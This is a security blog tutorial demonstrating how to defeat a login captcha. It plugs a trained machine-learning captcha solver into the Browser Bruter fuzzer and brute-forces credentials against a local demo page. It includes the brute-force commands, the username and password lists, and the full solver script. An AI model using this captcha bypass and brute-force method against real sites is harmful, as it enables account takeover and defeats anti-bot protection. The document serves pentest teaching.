Cracking The Captchas using Browser Bruter and Python

[Image Generated using AI Tools]

By Jafar Pathan

Without a doubt, captchas are one of the most critical security component of the web application to prevent automated bots interacting with the application.

But they are annoying during pentest and bug bounty engagements as well.

Thanks to the Browser Bruter's Python Scripting Engine, we can bypass such captchas using Machine Learning.

So buckle up as today I am going to demonstrate how you can bypass such captchas by utilizing the powerful Python Scripting Engine of the Browser Bruter.

Note: resources shown in this blog are all available within the 'res' directory of the Browser Bruter.

Setting up the Target Web Application

Let's first analyze our target, for the demonstration purpose, I have developed a sample page with captcha logic as shown in image below -

altImage

To follow along, you can start this sample page by navigating to the 'BrowserBruter/res/samples/captcha/' and running following command -

python3 captcha.py

If you got following error -

ModuleNotFoundError: No module named 'captcha'

just run following command -

pip3 install captcha

and while running above command, you got error like following -

sh error: externally-managed-environment

run the following command -

pip3 install captcha --break-system-packages

and you are good to go, you will expect output like following -

altImage

Now navigate to http://127.0.0.1:5000 and you should see the sample web page as shown in image above.

Let's analyze the target web application.

altImage

This is basic login form with added captcha to prevent automated attacks.

It has three input fields, 1. Username 2. Password 3. Captcha

Note: As this is for demonstration purpose, the password and username for the web application is admin:admin, and successful login will return welcome response.

Take 1: Fuzzing Without Captcha Bypass

Let's run the Browser Bruter Brute Force attack against this and analyze the behavior of attack.

To perform the BruteForce attack, I have prepared following payload lists:

usernames.txt: txt portaladmin admin@gmail.com guest admin email@123.com
passwords.txt: txt 1234 super_strong_password qesdgs6e56 wqwer password 123123123 admin

First let's build up the required options to run the attack.

--target: This will be 'http://127.0.0.1:5000/'
--attack: As we are going to run brute force attack, we will use attack mode 4
--elements-payloads: I have found the id of the elements which are as follows - 'username', 'password' respectively. So the option will be `--elements-payloads username:usernames.txt,password:passwords.txt
--button: I have found the name of the 'login' button which is 'submit' making our command --button submit
--fill: As the application requires captcha field too, for now we will use --fill option to fill it with random value. I have found it's id as 'captcha_input'.

So our final command will be as follows:

python3 BrowserBruter.py --target http://127.0.0.1:5000/ --attack 4 --elements-payloads username:usernames.txt,password:passwords.txt --button submit --fill captcha_input

Now let's run this and see the result:

altImage

Attack has been finished and report has been generated. Let's open this report in ReportExplorer.py

altImage

There's a lots of traffic, it's impossible to analyze each and every request one by one to see if we got the successful response.

To make things easier, thanks to the rich features of Browser Bruter, we can use --grep option of ReportExlorer to with "welcome" keyword to search this along the HTTP traffic, because 'welcome', 'hello', 'success', 'admin' are common keywords appear in successful response of login page.

I will run following command for this:

python3 ReportExplorer.py --report </path/to/report.csv> --grep welcome

altImage

Well, our attack has been failed, and we know the reason, it's because of captcha. Even though we had provided valid credentials, we were unsuccessful in bruteforcing the login page.

Now, to bruteforce this login, we have to first bypass the captcha. Let's jump to it.

Take 2: Bypassing the Captcha

I have prepared and trained a ML model to crack this captcha, How do I trained it? well that's a story for some another time.

Today, we will integrate this Machine Learning model into Browser Bruter to extend it's functionality to bypass this captcha.

To achieve this I have written following short python script -


  import os
  import random
  import cv2
  import string
  from PIL import Image, ImageDraw, ImageFont
  from captcha.image import ImageCaptcha
  import numpy as np
  import tensorflow as tf
  from tensorflow.keras import layers, models
  from tensorflow.keras.utils import to_categorical
  import requests
  
  # Function to preprocess and predict text from a sample captcha
  def predict_captcha(model, sample_captcha_path, label_to_int):
      # Load and preprocess the sample PNG captcha
      sample_captcha = cv2.imread(sample_captcha_path, cv2.IMREAD_GRAYSCALE)
      
      sample_captcha = cv2.resize(sample_captcha, (28 * 4, 28))
  
      # Chop the sample captcha into four characters
      character_width = 28
      characters = [sample_captcha[:, i:i + character_width] for i in range(0, sample_captcha.shape[1], character_width)]
  
      # Preprocess each character and make predictions
      predicted_text = ""
      for char_image in characters:
          char_image = char_image.reshape((1, 28, 28, 1)).astype("float32") / 255.0
          predictions = model.predict(char_image)
          predicted_label_idx = np.argmax(predictions)
          predicted_label = list(label_to_int.keys())[list(label_to_int.values()).index(predicted_label_idx)]
          predicted_text += predicted_label
  
      return predicted_text
  
  # Map labels to integers
  label_to_int = {char: idx for idx, char in enumerate(string.ascii_letters + string.digits)}
  num_classes = len(label_to_int)
  
  # Load the saved model
  model = tf.keras.models.load_model("res/samples/captcha_model.keras") # Change Here, Please provide correct path of the model
  # Re-compile the model to ensure metrics are set
  model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
  
  image_element = driver.find_element(By.ID, "captcha_image")
  img_url = image_element.get_attribute('src')
  
  response = requests.get(img_url)
  with open('image.png', 'wb') as file:
    file.write(response.content)
  
  # Example usage of the prediction function
  #sample_captcha_path = "sample.png"  # Change this to the path of your sample captcha
  predicted_text = predict_captcha(model, 'image.png', label_to_int)
  print("Predicted Text:", predicted_text)
  
  image_input_element = driver.find_element(By.ID, "captcha_input")
  
  image_input_element.clear()
  image_input_element.send_keys(predicted_text)

Below is the summary of what the above script is doing:

It imports libraries for image processing (cv2, PIL), machine learning (TensorFlow), and web automation
The main function predict_captcha processes and recognizes text from CAPTCHA images:
Takes a CAPTCHA image as input Converts it to grayscale and resizes it Splits the image into individual characters Uses a neural network model to predict each character
Combines the character predictions into the complete CAPTCHA text
The code creates a mapping between ASCII letters/digits and integers using labeltoint
It loads a pre-trained Keras model from "res/samples/captcha_model.keras"
The script finds a CAPTCHA image on a webpage using Selenium's driver.find_element
It downloads the CAPTCHA image from the extracted URL
After prediction, it:
- Locates the input field for the CAPTCHA solution
- Clears any existing text
- Enters the predicted CAPTCHA text

Above script requires several python packages to be installed, to install them run `pip3 install -r res/samples/requirements-for-ml-sample.txt`

Now, that we are done with our script. Let's import this script into Browser Bruter. We can achieve this using --python-file option provided by Browser Bruter as way to interact with Python Scripting Engine.

So our command will be as follows:

python3.12 BrowserBruter.py --target http://127.0.0.1:5000/ --attack 4 --elements-payloads username:usernames.txt,password:passwords.txt --button submit --python-file res/samples/bb-predict.py --print-error

I have made following changes in our original command: - I have removed the --fill option because as we will enter the correct captcha in captcha_input using Machine Learning Model. - I have added --print-error option because I want to see if there are any issues with my python script or not.

Now, let's run this bad boy,

altImage

Yeah, it's working, we are able to bypass the captcha by integrating Machine Learning into Browser Bruter.

Let's for wait the attack to finish.

altImage

It's done, let me analyze the result

altImage

And here it is, we found the credential and successfully bypassed the captcha.

So, this is how you can leverage Python Scripting Enginer of Browser Bruter to do all kinds of crazy stuff and fuzz the unfuzzable.

Keep fuzzing! Keep Hacking!

Contact

If you have any questions, suggestions, or feedback, feel free to connect with me on:

Github: https://github.com/zinja-coder

LinkedIn: https://www.linkedin.com/in/jafar-pathan/

Twitter: https://x.com/zinja_coder

About: https://zinja-coder.github.io/

Threads: jafar.khan.pathan_

Cracking The Captchas using Browser Bruter and Python

By Jafar Pathan

Note: resources shown in this blog are all available within the 'res' directory of the Browser Bruter.

Setting up the Target Web Application

Note: As this is for demonstration purpose, the password and username for the web application is admin:admin, and successful login will return welcome response.

Take 1: Fuzzing Without Captcha Bypass

Take 2: Bypassing the Captcha

Above script requires several python packages to be installed, to install them run pip3 install -r res/samples/requirements-for-ml-sample.txt

Contact

Above script requires several python packages to be installed, to install them run `pip3 install -r res/samples/requirements-for-ml-sample.txt`